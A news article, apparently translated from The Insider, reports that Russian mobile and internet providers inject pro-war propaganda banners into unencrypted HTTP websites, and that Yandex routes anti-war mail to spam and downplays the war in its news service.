Rostelecom and Megafon take advantage of vulnerable sites to promote war in Ukraine

Rostelecom and advertising of the “national idea of ​​our leader”

Russian ISP Rostelecom hosts state media propaganda news about the war in Ukraine on sites without HTTPS (Hypertext Transport Protocol Secure), which supports encryption for increased security and provides protection against attacks based on listening to a network connection (that is, sites with “http "). Twitter user @MosSobyaniin was the first to notice this when he “tested his site” on the GitHub web service. Roskomsvoboda specialists confirmed to The Insider that, according to their observations, almost all mobile operators and some “wired” operators are engaged in http traffic spoofing.

According to a user who tested his site, the links lead to materials from Tsargrad, Regnum, InoSMI, Lenta.ru, and other media about the war, “our leader’s national idea,” as well as texts that justify Russia’s crimes in Ukraine.

The author of the thread explained that Rostelecom intercepts the first JS script over an unencrypted http protocol and redirects a phishing script to the browser that inserts banners on the page. The request parameters of the phishing script include the address of the spoofed script and the subscriber's connection region. Next, the real script of the requested site is loaded. At the same time, the substitution occurs only with some sites that do not use HTTPS (there are few of them, according to the user) and have at least one JS script. The Russian was indignant at the fact that user traffic was changing in favor of state propaganda and called for abandoning the services of Rostelecom.

“Of course, you should immediately refuse the services of such an operator and use VPN ALWAYS – even when you are not on Twitter or Instagram. It’s scary that today Rostelecom is replacing traffic, but tomorrow they can already be on all operators with SORM.”

"MegaFon" and "Beeline" use the sites of small businesses for "war advertising"

A source from The Insider, who asked to remain anonymous, said that Russian small businesses are facing such “advertising” as it is more expensive to create websites with the HTTPS protocol. He told how his friend, the owner of a dental clinic, tried to deal with the situation, thinking first of all about hacking the site (the interlocutor allowed the video from the clinic's website to be published) . When checking, it turned out that advertising appears if you go to the site with the mobile operators Beeline and Megafon.

“About a month and a half ago, my friend, the owner of the clinic, contacted me with a request to urgently help, as his website was “hacked”. When he visited the site, a lot of the same type of propaganda ads were displayed, justifying Russia's military actions against Ukraine.”

According to the interlocutor, at first he thought that the hosting, the site or some external service that was used on the site had been hacked. However, it turned out that the advertisement was only visible from smartphones. The assumption that the phone was hacked was also not confirmed: advertisements were still displayed on “clean” Android and iPhone. It turned out that advertising is inserted by the mobile operator on absolutely all sites that operate on the insecure http protocol, the source notes. At the same time, sites operating on the https protocol function normally, since it is impossible to introduce foreign code into them from the operator's side.

“Such attacks are called “Man-in-the- middle ” and are considered malicious. Such an attack was noticed when using the mobile operators Beeline and Megafon. The only solution to the situation is to switch the site to the https protocol. But a lot of small business owners who have simple websites do not know how to do this, and usually such a transition comes with additional financial costs, which also not everyone can afford.

The interlocutor added that it would be very difficult for an unprepared user to find the reason for displaying such banners that appear due to "illegal actions" of operators.

“The fact that providers do this with news about Ukraine is kind of surreal”

As expert Aleksey Shkitin told The Insider, such a substitution on unprotected sites has been used before, mainly by advertisers. However, now it has been adopted to promote propaganda texts about the war in Ukraine. In his opinion, regional providers are most likely behind the propaganda. At the same time, they did not come up with anything “extremely new”: this technology is used by advertisers, substituting “phishing sites”. In fact, this is not pure phishing, but a crime, Shkitin adds.

“Roughly speaking, when you go through an insecure channel to the site, you allow various nasty things to be written there: for example, how a provider can substitute with advertising. That is, an insecure connection is therefore unsecured because another user can get there, in this case, the provider. But the fact that providers do this with news about Ukraine is kind of surreal.”

According to Shkitin, Moscow's Rostelecom is such a "regulated office" that it is unlikely to do such things. In the case of the placement of propaganda in the form of advertising, "regional providers are currying favor," the expert believes. Now, when you go to almost any site, “propaganda news about the war in Ukraine” appears.

“They used to plant advertisements, but now they plant propaganda. It looks like a local initiative, but it is hardly systemic. There is no special meaning in this. All opposition media in Russia are inaccessible, they are essentially closed. That is, now in Russia, whatever you open, there will be propaganda.”

War emails go to spam

Not only mobile operators are trying to convey to the Russians a position convenient for the authorities about the war in Ukraine. A Russian woman who received anti-war mailings on Yandex.Mail told The Insider that she found similar emails in her Spam folder. So, without her knowledge, among the "unnecessary" letters was the answer from the Anti-War Committee of Russia.

“I wrote to the Committee, I needed to know something, and they answered me. But the letter ended up in spam, and I did not see it for several days. In addition to this letter, I found in the spam a selection of news from the Agenda, which adheres to the anti-war line and makes honest news. I am subscribed to several such mailing lists. And now, it turns out what Yandex-mail does with them.

The interlocutor believes that this could not have happened by chance, and notes that in recent weeks, letters from publications “that are not subject to state censorship” have not appeared in the Inbox folder. According to her, the mailing should come often, so she suggested that Yandex "simply deleted" them.

This is not the first time the company has tried to hide information that the Russian authorities do not agree with. On March 1, the former head of Yandex.News Lev Gershenzon accused the Yandex.News service of hushing up the war in Ukraine.

“Today is the sixth day when at least 30 million Russian users see on the main page of Yandex that there is no war, there are no thousands of dead Russian soldiers, there are no dozens of civilians killed under Russian bombing, there are no dozens of prisoners, there is no huge destruction in various Ukrainian cities. . The fact that a significant part of the population of Russia may believe that there is no war is the basis and driving force of this war. Yandex today is a key element in hiding information about the war. Every day and hour of such “news” is human lives. And you, my former colleagues, are also responsible for this.”

At the same time, the company decided to get rid of Yandex.News and Zen, the buyer was found in the person of VK, whose CEO in 2021 was appointed the son of the deputy head of the Presidential Administration, Vladimir Kiriyenko. Back in 2016, Yandex refused to work with media outlets that did not have a license from Roskomnadzor, Meduza wrote. As a result, now only pro-government media remained in the top of Yandex.

One - advertising, the other - bans

After the outbreak of the war, Roskomnadzor demanded that the Russian media use only the wording “special operation” when covering the invasion of Ukraine. Since February 24, The Insider, Radio Liberty, Current Time, Krym.Realii, Voice of America, New Times, Taiga.info, DOXA, Ekho Moskvy, Dozhd have been blocked in Russia , Meduza, BBC Russian Service, Deutsche Welle and others. TV channel "Rain", radio "Echo of Moscow" and the Tomsk agency TV2 decided to stop working. In most cases, the block was initiated by the Russian Prosecutor General's Office. Roskomnadzor also blocked the social networks Facebook, Twitter and Instagram. And the court recognized the activities of the American corporation Meta as extremist and banned it in Russia.

American Daily Newspaper

Learn More →